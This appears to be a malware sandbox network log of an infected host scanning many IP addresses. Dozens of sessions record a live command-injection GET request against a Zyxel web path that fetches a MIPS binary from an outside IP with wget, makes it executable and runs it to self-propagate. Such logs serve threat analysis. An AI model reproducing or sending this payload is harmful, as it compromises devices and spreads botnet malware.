                                    Jan 13, 2024 19:02:54.658617973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9572192.168.2.1339282139.196.234.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658667088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9573192.168.2.1335264190.46.182.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658721924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9574192.168.2.1336358203.100.143.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658802032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9575192.168.2.1341086162.65.43.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658874989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9576192.168.2.1343026141.195.179.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658947945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9577192.168.2.1337152117.252.83.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659018993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9578192.168.2.1339706102.139.39.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659107924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9579192.168.2.135813459.148.230.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659169912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9580192.168.2.1348118179.125.160.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659244061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9581192.168.2.133307475.75.23.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659352064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9582192.168.2.1344262196.186.194.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659395933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9583192.168.2.133965264.26.88.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659461021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9584192.168.2.1351618120.53.117.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659534931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9585192.168.2.133965665.146.89.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659574986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9586192.168.2.134130663.165.220.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659636974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9587192.168.2.133644471.38.8.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659698963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9588192.168.2.1341104177.89.81.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659779072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9589192.168.2.135763065.135.41.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659852982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9590192.168.2.1338130149.193.160.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.659965992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9591192.168.2.1347970220.28.225.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660057068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9592192.168.2.1335036103.109.43.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660120010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9593192.168.2.1340924121.97.133.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660186052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9594192.168.2.134090237.161.234.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660238981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9595192.168.2.134558652.79.2.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660295010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9596192.168.2.133789889.246.197.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660332918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9597192.168.2.133947679.105.11.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660401106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9598192.168.2.1335216196.138.81.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660476923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9599192.168.2.1356130203.156.40.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660553932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9600192.168.2.1355050144.201.9.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660609007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9601192.168.2.133542090.252.0.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660686016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9602192.168.2.1344532118.114.250.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660756111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9603192.168.2.135773847.0.237.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660805941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9604192.168.2.1336874222.66.49.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660859108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9605192.168.2.1352264206.70.164.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660931110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9606192.168.2.134985848.105.193.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.660991907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9607192.168.2.1342632171.166.126.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661051035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9608192.168.2.134991263.58.26.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661124945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9609192.168.2.1344414212.114.29.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661170959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9610192.168.2.1348120106.93.2.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661263943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9611192.168.2.1359532152.222.115.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661336899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9612192.168.2.1336414126.178.226.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661417961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9613192.168.2.1350052110.203.149.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.661493063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9614192.168.2.1346534220.226.193.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9615192.168.2.1348444132.219.2.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9616192.168.2.135820069.224.167.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9617192.168.2.134088066.139.215.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9618192.168.2.133511448.68.240.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9619192.168.2.1340864140.208.32.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9620192.168.2.134398686.60.228.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9621192.168.2.134873653.6.118.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9622192.168.2.134659685.96.41.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9623192.168.2.1334346112.220.254.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9624192.168.2.133850250.100.64.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9625192.168.2.134259698.107.35.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9626192.168.2.135875425.167.63.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9627192.168.2.1348862111.182.228.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9628192.168.2.1354428189.253.32.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9629192.168.2.1357768124.179.187.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9630192.168.2.1335582206.244.19.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9631192.168.2.1345658193.40.56.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9632192.168.2.135974479.172.157.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9633192.168.2.134730841.117.177.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9634192.168.2.134975053.238.50.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9635192.168.2.1360414119.230.13.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9636192.168.2.1335792180.25.185.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9637192.168.2.133323632.189.154.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9638192.168.2.1339250129.72.226.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9639192.168.2.133557089.188.3.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9640192.168.2.134415651.57.214.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9641192.168.2.133480093.63.116.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9642192.168.2.1334908114.224.241.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9643192.168.2.135502840.245.217.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9644192.168.2.136039438.87.129.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9645192.168.2.1336792198.39.115.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9646192.168.2.134451896.33.134.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9647192.168.2.1333902130.149.90.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9648192.168.2.1338742106.94.144.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9649192.168.2.1354882103.229.253.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9650192.168.2.134988854.0.215.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9651192.168.2.1345734186.227.3.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9652192.168.2.1348222113.95.85.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9653192.168.2.135398499.66.104.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9654192.168.2.13439769.176.229.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9655192.168.2.1352074190.150.194.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9656192.168.2.1357346144.170.218.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9657192.168.2.1347780109.33.20.598080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9658192.168.2.135013292.179.157.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9659192.168.2.1344568158.72.180.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9660192.168.2.134453874.195.223.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9661192.168.2.134015695.129.221.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9662192.168.2.133416232.36.5.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9663192.168.2.1350724178.234.14.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9664192.168.2.1357770126.171.38.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9665192.168.2.1350412110.65.9.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9666192.168.2.1345640218.41.174.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9667192.168.2.135095295.25.148.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9668192.168.2.1351868170.10.35.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9669192.168.2.1347552133.98.87.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9670192.168.2.1344574144.191.64.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9671192.168.2.1337580170.209.109.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9672192.168.2.1353206118.127.99.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9673192.168.2.1353852144.227.20.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9674192.168.2.1355326124.83.188.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9675192.168.2.1353422123.101.148.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9676192.168.2.1353986163.5.180.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9677192.168.2.134415618.131.27.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9678192.168.2.1355482147.232.35.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9679192.168.2.1353778103.195.158.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9680192.168.2.1343378169.140.139.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9681192.168.2.13555109.128.47.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9682192.168.2.1338554176.200.227.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9683192.168.2.1336272164.0.83.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9684192.168.2.133725838.140.9.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9685192.168.2.133713445.241.1.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
